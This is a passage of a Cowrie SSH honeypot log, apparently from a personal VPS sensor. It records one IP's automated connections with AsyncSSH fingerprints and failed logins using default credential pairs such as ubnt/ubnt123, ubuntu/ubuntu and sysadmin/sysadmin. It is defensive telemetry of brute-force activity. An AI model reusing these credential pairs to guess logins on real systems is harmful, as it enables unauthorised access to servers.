a-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:15:47.369031Z","src_ip":"212.227.235.229","session":"a6ff368630f9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:15:47.622606Z","src_ip":"212.227.235.229","session":"bfd8534d4089"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:15:48.539293Z","src_ip":"212.227.235.229","session":"bfd8534d4089"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt123","message":"login attempt [ubnt/ubnt123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:15:49.015842Z","src_ip":"212.227.235.229","session":"a6ff368630f9"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:49.906011Z","src_ip":"212.227.235.229","session":"bfd8534d4089"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:50.375112Z","src_ip":"212.227.235.229","session":"a6ff368630f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36270,"dst_ip":"1.2.3.4","dst_port":22,"session":"795fc1d695c9","protocol":"ssh","message":"New connection: 212.227.235.229:36270 (1.2.3.4:22) [session: 795fc1d695c9]","sensor":"my-vps","timestamp":"2025-08-26T04:15:53.543440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:15:53.678168Z","src_ip":"212.227.235.229","session":"795fc1d695c9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:15:53.824288Z","src_ip":"212.227.235.229","session":"795fc1d695c9"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"tpuser","message":"login attempt [ftp/tpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T04:15:55.647860Z","src_ip":"212.227.235.229","session":"795fc1d695c9"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:57.003408Z","src_ip":"212.227.235.229","session":"795fc1d695c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34090,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce856b670890","protocol":"ssh","message":"New connection: 212.227.235.229:34090 (1.2.3.4:22) [session: ce856b670890]","sensor":"my-vps","timestamp":"2025-08-26T04:15:58.917225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:15:58.918170Z","src_ip":"212.227.235.229","session":"ce856b670890"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:15:59.231064Z","src_ip":"212.227.235.229","session":"ce856b670890"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:00.706430Z","src_ip":"212.227.235.229","session":"ce856b670890"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34096,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cca2a682cc6","protocol":"ssh","message":"New connection: 212.227.235.229:34096 (1.2.3.4:22) [session: 2cca2a682cc6]","sensor":"my-vps","timestamp":"2025-08-26T04:16:01.241761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:01.256285Z","src_ip":"212.227.235.229","session":"2cca2a682cc6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:01.490391Z","src_ip":"212.227.235.229","session":"2cca2a682cc6"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:02.029213Z","src_ip":"212.227.235.229","session":"ce856b670890"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34104,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb413816f311","protocol":"ssh","message":"New connection: 212.227.235.229:34104 (1.2.3.4:22) [session: eb413816f311]","sensor":"my-vps","timestamp":"2025-08-26T04:16:02.559615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:02.567084Z","src_ip":"212.227.235.229","session":"eb413816f311"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:02.829228Z","src_ip":"212.227.235.229","session":"eb413816f311"}
{"eventid":"cowrie.login.failed","username":"madrid","password":"madrid","message":"login attempt [madrid/madrid] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:02.919381Z","src_ip":"212.227.235.229","session":"2cca2a682cc6"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:05.080269Z","src_ip":"212.227.235.229","session":"2cca2a682cc6"}
{"eventid":"cowrie.login.failed","username":"sysadmin","password":"sysadmin","message":"login attempt [sysadmin/sysadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:05.294115Z","src_ip":"212.227.235.229","session":"eb413816f311"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:06.575304Z","src_ip":"212.227.235.229","session":"eb413816f311"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36842,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9d9d7f1e5f7","protocol":"ssh","message":"New connection: 212.227.235.229:36842 (1.2.3.4:22) [session: f9d9d7f1e5f7]","sensor":"my-vps","timestamp":"2025-08-26T04:16:17.868223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:17.869197Z","src_ip":"212.227.235.229","session":"f9d9d7f1e5f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42670,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b0d4f6d9b9d","protocol":"ssh","message":"New connection: 212.227.235.229:42670 (1.2.3.4:22) [session: 2b0d4f6d9b9d]","sensor":"my-vps","timestamp":"2025-08-26T04:16:18.032858Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: 